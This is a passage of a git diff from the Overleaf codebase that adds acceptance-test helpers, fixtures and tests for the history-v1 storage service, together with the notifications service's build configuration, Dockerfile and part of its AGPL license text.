clearBucket(config.get('blobStore.globalBucket')), + clearBucket(config.get('blobStore.projectBucket')), + clearBucket(config.get('chunkStore.bucket')), + clearBucket(config.get('zipStore.bucket')), + ]) +} + +async function clearBucket(name) { + await persistor.deleteDirectory(name, '') +} + +let s3PersistorForBackupCleanup + +async function cleanupBackup() { + // The backupPersistor refuses to delete short prefixes. Use a low-level S3 persistor. + if (!s3PersistorForBackupCleanup) { + const { backupPersistor } = await import( + '../../../../../storage/lib/backupPersistor.mjs' + ) + s3PersistorForBackupCleanup = new S3Persistor(backupPersistor.settings) + } + await Promise.all( + Object.values(config.get('backupStore')).map(name => + s3PersistorForBackupCleanup.deleteDirectory(name, '') + ) + ) +} + +async function cleanupEverything() { + // Set the timeout when called in a Mocha test. This function is also called + // in benchmarks where it is not passed a Mocha context. + this.timeout?.(5000) + await Promise.all([ + cleanupPostgres(), + cleanupMongo(), + cleanupPersistor(), + cleanupBackup(), + cleanupRedis(), + ]) +} + +module.exports = { + postgres: cleanupPostgres, + mongo: cleanupMongo, + persistor: cleanupPersistor, + backup: cleanupBackup, + redis: cleanupRedis, + everything: cleanupEverything, +} diff --git a/services/history-v1/test/acceptance/js/storage/support/fetch.js b/services/history-v1/test/acceptance/js/storage/support/fetch.js new file mode 100644 index 0000000..316f521 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/support/fetch.js @@ -0,0 +1,6 @@ +const BPromise = require('bluebird') +const fetch = require('node-fetch') + +fetch.Promise = BPromise + +module.exports = fetch diff --git a/services/history-v1/test/acceptance/js/storage/support/fixtures.js b/services/history-v1/test/acceptance/js/storage/support/fixtures.js new file mode 100644 index 0000000..f077b3e --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/support/fixtures.js @@ -0,0 +1,20 @@ +'use strict' + +const BPromise = require('bluebird') +const dbSpecs = require('../fixtures').dbSpecs +const knex = require('../../../../../storage').knex +const historyStore = require('../../../../../storage').historyStore + +function createFixtures() { + return knex('chunks') + .insert(dbSpecs.chunks) + .then(() => { + return BPromise.mapSeries(dbSpecs.histories, history => + historyStore.storeRaw(history.projectId, history.chunkId, history.json) + ) + }) +} + +exports.create = createFixtures +exports.chunks = require('../fixtures/chunks').chunks +exports.docs = require('../fixtures/docs').docs diff --git a/services/history-v1/test/acceptance/js/storage/support/test_files.js b/services/history-v1/test/acceptance/js/storage/support/test_files.js new file mode 100644 index 0000000..c28443c --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/support/test_files.js @@ -0,0 +1,27 @@ +const path = require('node:path') + +exports.path = function (pathname) { + return path.join(__dirname, '..', 'files', pathname) +} + +exports.GRAPH_PNG_HASH = '81dac49dc128aa0a7d0263d24c0d1ce14de554a8' +exports.GRAPH_PNG_BYTE_LENGTH = 13476 + +exports.HELLO_TXT_HASH = '80dc915a94d134320281f2a139c018facce4b670' +exports.HELLO_TXT_BYTE_LENGTH = 11 +exports.HELLO_TXT_UTF8_LENGTH = 10 + +// file is UTF-8 encoded and contains non-BMP characters +exports.NON_BMP_TXT_HASH = '323ec6325a14288a81e15bc0bbee0c0a35f38049' +exports.NON_BMP_TXT_BYTE_LENGTH = 57 + +// file contains null characters 
+exports.NULL_CHARACTERS_TXT_HASH = '4227ca4e8736af63036e7457e2db376ddf7e5795' +exports.NULL_CHARACTERS_TXT_BYTE_LENGTH = 3 + +// git hashes of some short strings for testing +exports.STRING_A_HASH = '2e65efe2a145dda7ee51d1741299f848e5bf752e' +exports.STRING_AB_HASH = '9ae9e86b7bd6cb1472d9373702d8249973da0832' + +// From https://en.wikipedia.org/wiki/Portable_Network_Graphics +exports.PNG_MAGIC_NUMBER = '89504e470d0a1a0a' diff --git a/services/history-v1/test/acceptance/js/storage/support/unzip.js b/services/history-v1/test/acceptance/js/storage/support/unzip.js new file mode 100644 index 0000000..c89c3d4 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/support/unzip.js @@ -0,0 +1,22 @@ +'use strict' + +const BPromise = require('bluebird') +const yauzl = BPromise.promisifyAll(require('yauzl')) + +function getZipEntries(pathname) { + function readEntries(zip) { + return new BPromise((resolve, reject) => { + const entries = [] + zip.on('entry', entry => { + entries.push(entry) + }) + zip.on('error', reject) + zip.on('end', () => { + resolve(entries) + }) + }) + } + return yauzl.openAsync(pathname).then(readEntries) +} + +exports.getZipEntries = getZipEntries diff --git a/services/history-v1/test/acceptance/js/storage/tasks.test.js b/services/history-v1/test/acceptance/js/storage/tasks.test.js new file mode 100644 index 0000000..e43bdac --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/tasks.test.js @@ -0,0 +1,115 @@ +'use strict' + +const { ObjectId } = require('mongodb') +const { expect } = require('chai') +const config = require('config') +const tasks = require('../../../../storage/tasks') +const { + persistor, + historyStore, + knex, + mongodb, +} = require('../../../../storage') +const cleanup = require('./support/cleanup') + +const CHUNK_STORE_BUCKET = config.get('chunkStore.bucket') +const postgresProjectId = 1 +const mongoProjectId = new ObjectId('abcdefabcdefabcdefabcdef') + +describe('tasks', function () { + beforeEach(cleanup.everything) + + const options = { + batchSize: 3, + timeout: 3000, + minAgeSecs: 3600, + maxBatches: 1000, + } + + it('deletes old chunks', async function () { + const postgresChunks = [] + const mongoChunks = [] + + for (let i = 1; i <= 25; i++) { + const deletedAt = new Date(Date.now() - 86400000) + const startVersion = (i - 1) * 10 + const endVersion = i * 10 + postgresChunks.push({ + chunk_id: i, + doc_id: postgresProjectId, + start_version: startVersion, + end_version: endVersion, + deleted_at: deletedAt, + }) + mongoChunks.push({ + _id: new ObjectId(i.toString().padStart(24, '0')), + projectId: mongoProjectId, + startVersion, + endVersion, + state: 'deleted', + updatedAt: deletedAt, + }) + } + + for (let i = 26; i <= 30; i++) { + const deletedAt = new Date() + const startVersion = (i - 1) * 10 + const endVersion = i * 10 + postgresChunks.push({ + chunk_id: i, + doc_id: postgresProjectId, + start_version: startVersion, + end_version: endVersion, + deleted_at: deletedAt, + }) + mongoChunks.push({ + _id: new ObjectId(i.toString().padStart(24, '0')), + projectId: mongoProjectId, + startVersion, + endVersion, + state: 'deleted', + updatedAt: deletedAt, + }) + } + + await knex('old_chunks').insert(postgresChunks) + await mongodb.chunks.insertMany(mongoChunks) + await Promise.all([ + ...postgresChunks.map(chunk => + historyStore.storeRaw( + postgresProjectId.toString(), + chunk.chunk_id.toString(), + { + history: 'raw history', + } + ) + ), + ...mongoChunks.map(chunk => + historyStore.storeRaw(mongoProjectId.toString(), 
chunk._id.toString(), { + history: 'raw history', + }) + ), + ]) + await expectChunksExist(1, 30, true) + await tasks.deleteOldChunks(options) + await expectChunksExist(1, 25, false) + await expectChunksExist(26, 30, true) + }) +}) + +async function expectChunksExist(minChunkId, maxChunkId, expected) { + const keys = [] + for (let i = minChunkId; i <= maxChunkId; i++) { + keys.push(`100/000/000/${i.toString().padStart(9, '0')}`) + keys.push(`fed/cba/fedcbafedcbafedcba/${i.toString().padStart(24, '0')}`) + } + return await Promise.all( + keys.map(async key => { + const exists = await persistor.checkIfObjectExists( + CHUNK_STORE_BUCKET, + key + ) + expect(exists).to.equal(expected) + }) + ) +} diff --git a/services/history-v1/test/acceptance/js/storage/zip_store.test.js b/services/history-v1/test/acceptance/js/storage/zip_store.test.js new file mode 100644 index 0000000..255751a --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/zip_store.test.js @@ -0,0 +1,101 @@ +'use strict' + +const BPromise = require('bluebird') +const { expect } = require('chai') +const fs = BPromise.promisifyAll(require('node:fs')) +const temp = require('temp') + +const cleanup = require('./support/cleanup') +const fetch = require('./support/fetch') +const fixtures = require('./support/fixtures') +const { getZipEntries } = require('./support/unzip') + +const { Snapshot, File } = require('overleaf-editor-core') + +const { zipStore } = require('../../../../storage') + +describe('zipStore', function () { + beforeEach(cleanup.persistor) + + let zipFilePath + beforeEach(function () { + zipFilePath = temp.path({ suffix: '.zip' }) + }) + afterEach(async function () { + try { + await fs.unlinkAsync(zipFilePath) + } catch (_error) { + // Ignore. + } + }) + + it('stores a snapshot in a zip file', async function () { + const projectId = fixtures.docs.uninitializedProject.id + const version = 1 + const testSnapshot = new Snapshot() + testSnapshot.addFile('hello.txt', File.fromString('hello world')) + + const zipUrl = await zipStore.getSignedUrl(projectId, version) + + // Initially, there is no zip file; we should get a 404. + const preZipResponse = await fetch(zipUrl) + expect(preZipResponse.status).to.equal(404) + + // Build the zip file. + await zipStore.storeZip(projectId, version, testSnapshot) + + // Now we should be able to fetch it. + const postZipResponse = await fetch(zipUrl) + expect(postZipResponse.status).to.equal(200) + const zipBuffer = await postZipResponse.buffer() + await fs.writeFileAsync(zipFilePath, zipBuffer) + const entries = await getZipEntries(zipFilePath) + expect(entries.length).to.equal(1) + expect(entries[0].fileName).to.equal('hello.txt') + }) + + it('filters out tracked deletes', async function () { + const projectId = fixtures.docs.uninitializedProject.id + const version = 1 + const testSnapshot = new Snapshot() + testSnapshot.addFile( + 'test.tex', + File.fromRaw({ + content: 'the quick brown fox jumps over the lazy dog', + trackedChanges: [ + { + range: { pos: 4, length: 6 }, + tracking: { + type: 'delete', + ts: '2024-01-01T00:00:00.000Z', + userId: 'user1', + }, + }, + { + range: { pos: 35, length: 5 }, + tracking: { + type: 'delete', + ts: '2023-01-01T00:00:00.000Z', + userId: 'user2', + }, + }, + ], + }) + ) + + const zipUrl = await zipStore.getSignedUrl(projectId, version) + // Build the zip file. + await zipStore.storeZip(projectId, version, testSnapshot) + // Now we should be able to fetch it. 
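+    // (For reference: the tracked 'delete' ranges above cover 'quick '
+    // (pos 4, length 6) and 'lazy ' (pos 35, length 5). Assuming storeZip
+    // writes file content with tracked deletions stripped, the zip entry
+    // should read 'the brown fox jumps over the dog', which is what the
+    // uncompressedSize assertion below checks.)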
+ const postZipResponse = await fetch(zipUrl) + expect(postZipResponse.status).to.equal(200) + const zipBuffer = await postZipResponse.buffer() + await fs.writeFileAsync(zipFilePath, zipBuffer) + const entries = await getZipEntries(zipFilePath) + expect(entries.length).to.equal(1) + expect(entries[0].fileName).to.equal('test.tex') + expect(entries[0].uncompressedSize).to.equal( + 'the brown fox jumps over the dog'.length + ) + }) +}) diff --git a/services/history-v1/test/acceptance/pg-init/set-up-readOnly-user.sql b/services/history-v1/test/acceptance/pg-init/set-up-readOnly-user.sql new file mode 100644 index 0000000..3a1abf3 --- /dev/null +++ b/services/history-v1/test/acceptance/pg-init/set-up-readOnly-user.sql @@ -0,0 +1,2 @@ +CREATE USER read_only PASSWORD 'password'; +ALTER DEFAULT PRIVILEGES FOR USER overleaf IN SCHEMA public GRANT SELECT ON TABLES TO read_only; diff --git a/services/history-v1/test/setup.js b/services/history-v1/test/setup.js new file mode 100644 index 0000000..6097417 --- /dev/null +++ b/services/history-v1/test/setup.js @@ -0,0 +1,67 @@ +const chai = require('chai') +const chaiAsPromised = require('chai-as-promised') +const config = require('config') +const fetch = require('node-fetch') +const { knex, mongodb, redis } = require('../storage') + +// ensure every ObjectId has the id string as a property for correct comparisons +require('mongodb').ObjectId.cacheHexString = true + +chai.use(chaiAsPromised) +chai.config.truncateThreshold = 0 + +async function setupPostgresDatabase() { + this.timeout(60_000) + await knex.migrate.latest() +} + +async function setupMongoDatabase() { + this.timeout(60_000) + await mongodb.db.collection('projectHistoryChunks').createIndexes([ + { + key: { projectId: 1, startVersion: 1 }, + name: 'projectId_1_startVersion_1', + partialFilterExpression: { state: { $in: ['active', 'closed'] } }, + unique: true, + }, + { + key: { state: 1 }, + name: 'state_1', + partialFilterExpression: { state: 'deleted' }, + }, + ]) +} + +async function createGcsBuckets() { + this.timeout(60_000) + for (const bucket of [ + config.get('blobStore.globalBucket'), + config.get('blobStore.projectBucket'), + config.get('chunkStore.bucket'), + config.get('zipStore.bucket'), + 'fake-user-files-gcs', + ]) { + await fetch('http://gcs:9090/storage/v1/b', { + method: 'POST', + body: JSON.stringify({ name: bucket }), + headers: { 'Content-Type': 'application/json' }, + }) + } +} + +// Tear down the connection pool after all the tests have run, so the process +// can exit. 
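+// (Editorial aside: Node keeps the process alive while handles such as the
+// knex pool and the redis clients stay open. Assuming those are the only
+// long-lived connections here, destroying/disconnecting them in an afterAll
+// hook lets Mocha exit without needing the --exit flag.)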
+async function tearDownConnectionPool() { + await knex.destroy() + await redis.disconnect() +} + +module.exports = { + setupPostgresDatabase, + createGcsBuckets, + tearDownConnectionPool, + mochaHooks: { + beforeAll: [setupPostgresDatabase, setupMongoDatabase, createGcsBuckets], + afterAll: [tearDownConnectionPool], + }, +} diff --git a/services/history-v1/tsconfig.json b/services/history-v1/tsconfig.json new file mode 100644 index 0000000..0e20309 --- /dev/null +++ b/services/history-v1/tsconfig.json @@ -0,0 +1,18 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "api/**/*", + "app.js", + "app/js/**/*", + "backup-deletion-app.mjs", + "backup-verifier-app.mjs", + "backup-worker-app.mjs", + "benchmarks/**/*", + "config/**/*", + "migrations/**/*", + "scripts/**/*", + "storage/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/notifications/.gitignore b/services/notifications/.gitignore new file mode 100644 index 0000000..8a030e9 --- /dev/null +++ b/services/notifications/.gitignore @@ -0,0 +1,54 @@ +Compiled source # +################### +*.com +*.class +*.dll +*.exe +*.o +*.so + +# Packages # +############ +# it's better to unpack these files and commit the raw source +# git has its own built in compression methods +*.7z +*.dmg +*.gz +*.iso +*.jar +*.rar +*.tar +*.zip + +# Logs and databases # +###################### +*.log +*.sql +*.sqlite + +# OS generated files # +###################### +.DS_Store? +ehthumbs.db +Icon? +Thumbs.db + +node_modules/* +data/* + +cookies.txt +UserAndProjectPopulator.coffee + +public/stylesheets/style.css + +Gemfile.lock + +*.swp +.DS_Store + +app/views/external + +/modules/ + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/notifications/.mocharc.json b/services/notifications/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/notifications/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/notifications/.nvmrc b/services/notifications/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/notifications/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/notifications/Dockerfile b/services/notifications/Dockerfile new file mode 100644 index 0000000..16a5c44 --- /dev/null +++ b/services/notifications/Dockerfile @@ -0,0 +1,27 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/notifications + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/notifications/package.json /overleaf/services/notifications/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/notifications/ /overleaf/services/notifications/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/notifications/LICENSE b/services/notifications/LICENSE new file mode 100644 index 0000000..dba13ed --- /dev/null +++ b/services/notifications/LICENSE @@ -0,0 +1,661 @@ + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. 
<http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. 
+ + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. 
This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. 
This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. 
+ + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. 
+ + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. 
+ + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. 
